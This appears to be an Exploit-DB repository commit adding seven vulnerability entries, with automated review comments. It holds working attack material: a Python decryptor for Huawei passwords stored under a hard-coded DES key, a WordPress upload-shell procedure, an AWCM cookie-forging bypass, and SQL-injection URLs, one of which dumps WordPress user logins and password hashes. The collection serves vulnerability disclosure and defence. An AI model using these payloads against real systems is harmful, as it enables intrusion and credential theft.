DB: 2015-08-31
7 new exploits
parent
4fe29b09c1
commit
b0a05de4d0
8 changed files with 159 additions and 0 deletions
|
@ -34311,6 +34311,7 @@ id,file,description,date,author,platform,type,port
|
|||
37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting Vulnerability",2012-10-31,"Anthony Trummer",asp,webapps,0
|
||||
37996,platforms/windows/remote/37996.txt,"Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability",2012-10-31,"Zhao Liang",windows,remote,0
|
||||
37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
|
||||
37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80
|
||||
37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
|
||||
38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
|
||||
38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
|
||||
|
@ -34324,3 +34325,9 @@ id,file,description,date,author,platform,type,port
|
|||
38011,platforms/php/webapps/38011.txt,"OrangeHRM 'sortField' Parameter SQL Injection Vulnerability",2012-11-07,"High-Tech Bridge",php,webapps,0
|
||||
38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin 'id' Parameter SQL Injection Vulnerability",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22
|
||||
38015,platforms/php/webapps/38015.txt,"AR Web Content Manager (AWCM) cookie_gen.php Arbitrary Cookie Generation Weakness",2012-11-08,"Sooel Son",php,webapps,0
|
||||
38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server 'where' Form Field SQL Injection Vulnerability",2012-11-09,anonymous,multiple,webapps,0
|
||||
38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme 'ID' Parameter SQL Injection Vulnerability",2012-11-09,sil3nt,php,webapps,0
|
||||
38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin 'cid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin 'eid' Parameter SQL Injection Vulnerability",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products Password Encryption Weakness",2012-11-13,"Roberto Paleari",hardware,remote,0
|
||||
|
|
|
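--- a/platforms/hardware/remote/38020.py
+++ b/platforms/hardware/remote/38020.py
@@ -0,0 +1,63 @@
+source: http://www.securityfocus.com/bid/56510/info
+
+Multiple Huawei products are prone to a weak password encryption weakness.
+
+Successful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks.
+
+The following are vulnerable:
+
+Huawei Quidway series
+Huawei CX600 V600R001
+Huawei CX600 V600R003C00SPC900
+Huawei ME60 V600R002C07 and prior versions
+AR 19/29/49 R2207 and prior versions
+
+from Crypto.Cipher import DES
+
+def decode_char(c):
+if c == 'a':
+r = '?'
+else:
+r = c
+return ord(r) - ord('!')
+
+def ascii_to_binary(s):
+assert len(s) == 24
+
+out = [0]*18
+i = 0
+j = 0
+
+for i in range(0, len(s), 4):
+y = decode_char(s[i + 0])
+y = (y << 6) & 0xffffff
+
+k = decode_char(s[i + 1])
+y = (y | k) & 0xffffff
+y = (y << 6) & 0xffffff
+
+k = decode_char(s[i + 2])
+y = (y | k) & 0xffffff
+y = (y << 6) & 0xffffff
+
+k = decode_char(s[i + 3])
+y = (y | k) & 0xffffff
+
+out[j+2] = chr(y & 0xff)
+out[j+1] = chr((y>>8) & 0xff)
+out[j+0] = chr((y>>16) & 0xff)
+
+j += 3
+
+return "".join(out)
+
+def decrypt_password(p):
+r = ascii_to_binary(p)
+
+r = r[:16]
+
+d = DES.new("\x01\x02\x03\x04\x05\x06\x07\x08", DES.MODE_ECB)
+r = d.decrypt(r)
+
+return r.rstrip("\x00")
+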
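Review bot: The advisory text at the top of 38020.py (the `source:` line through the affected-products list) is plain prose rather than comments, so as shown the file cannot be imported or run as Python until that header is moved into a module docstring or `#` lines. In `ascii_to_binary`, `assert len(s) == 24` is the only input check and is stripped under `python -O`; `if len(s) != 24: raise ValueError("expected a 24-character encoded password")` keeps the check in every mode. The string handling (`chr(...)` values joined into a `str`, a `str` key passed to `DES.new`) looks Python 2-only, which is worth stating in the header. For defenders reading this entry, the fixed DES key in `decrypt_password` means any configuration backup holding these 24-character values should be handled as if it held cleartext passwords, and the affected credentials rotated.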
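--- a/platforms/multiple/webapps/38016.txt
+++ b/platforms/multiple/webapps/38016.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56474/info
+
+ESRI ArcGIS for Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+ESRI ArcGIS for Server 10.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com:6080/arcgis/rest/services//query?f=json&where=featured%3Dtrue&returnGeometry=true&spatialRel=esriSpatialRelIntersects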
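--- a/platforms/php/webapps/37998.txt
+++ b/platforms/php/webapps/37998.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Wordpress Responsive Thumbnail Slider Arbitrary File Upload
+# Date: 2015/8/29
+# Exploit Author: Arash Khazaei
+# Vendor Homepage:
+https://wordpress.org/plugins/wp-responsive-thumbnail-slider/
+# Software Link:
+https://downloads.wordpress.org/plugin/wp-responsive-thumbnail-slider.zip
+# Version: 1.0
+# Tested on: Kali , Iceweasel Browser
+# CVE : N/A
+# Contact : http://twitter.com/0xClay
+# Email : 0xclay@gmail.com
+# Site : http://bhunter.ir
+
+# Intrduction :
+
+# Wordpress Responsive Thumbnail Slider Plugin iS A With 6000+ Active
+Install
+# And Suffer From A File Upload Vulnerability Allow Attacker Upload Shell
+As A Image .
+# Authors , Editors And Of Course Administrators This Vulnerability To Harm
+WebSite .
+
+# POC :
+
+# For Exploiting This Vulnerability :
+
+# Go To Add Image Section And Upload File By Self Plugin Uploader
+# Then Upload File With Double Extension Image
+# And By Using A BurpSuite Or Tamper Data Change The File Name From
+Shell.php.jpg To Shell.php
+# And Shell Is Uploaded . :)
+
+
+
+<!-- Discovered By Arash Khazaei (Aka JunkyBoy) -->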
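Review bot: The entry lists `# Version: 1.0` and `# CVE : N/A` but records no fixed release, vendor response or mitigation, so a reader cannot tell from it whether updating the plugin closes the issue; a line such as `# Fix: <fixed version, or "none at time of writing">` would complete it. The sentence beginning `# Authors , Editors And Of Course Administrators` has lost its verb, so the privilege level required is only implied; presumably it means those roles can reach the upload form. The steps describe a file-name check that is enforced only before the request is sent, so the defensive counterpart is a server-side extension and content-type allow-list in the upload handler, plus an uploads directory in which PHP is not executed.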
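--- a/platforms/php/webapps/38015.txt
+++ b/platforms/php/webapps/38015.txt
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/56465/info
+
+AWCM is prone to an authentication-bypass and multiple security-bypass vulnerabilities.
+
+Attackers can exploit these vulnerabilities to bypass certain security restrictions, perform unauthorized actions; which may aid in further attacks.
+
+AWCM 2.2 is vulnerable; other versions may also be affected.
+
+Authentication Bypass:
+
+http://www.example.com/awcm/cookie_gen.php?name=\'key\'&content=\'value\'
+ex) http://targethost/awcm/cookie_gen.php?
+name=awcm_member&content=123456
+
+Security Bypass:
+
+[form action=\"http://www.example.com/awcm/show_video.php?coment=exploit\"
+method=\"post\"]
+[input type=\"hidden\" name=\"coment\" value=\'insert
+uninvited comments 2\' /]
+[input type=\"submit\" value=\"Submit\"]
+</form>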
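Review bot: The write-up calls the `cookie_gen.php` request an authentication bypass without saying what the application does with the resulting cookie; presumably AWCM accepts a client-set `awcm_member` cookie as proof of login, and one sentence stating that would make the entry self-explanatory. No fixed version or workaround is recorded beyond `AWCM 2.2 is vulnerable`. For detection, web logs showing requests to `cookie_gen.php` with `name=` and `content=` parameters, or posts to `show_video.php` carrying `coment`, are the indicators this entry implies. Removing or access-restricting `cookie_gen.php` is the obvious interim control until login state is kept server-side.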
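--- a/platforms/php/webapps/38017.txt
+++ b/platforms/php/webapps/38017.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/56477/info
+
+The Kakao theme for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/themes/kakao/sonHaberler.php?ID=-1+union+select+1,2,3,4,5,group_concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wp_users--
+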
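--- a/platforms/php/webapps/38018.txt
+++ b/platforms/php/webapps/38018.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56478/info
+
+The PHP Event Calendar plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/plugins/Calendar-Script/load-events.php?cid=1[SQL]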
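--- a/platforms/php/webapps/38019.txt
+++ b/platforms/php/webapps/38019.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/56479/info
+
+The Eco-annu plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/wp-content/plugins/eco-annu/map.php?eid=[SQL]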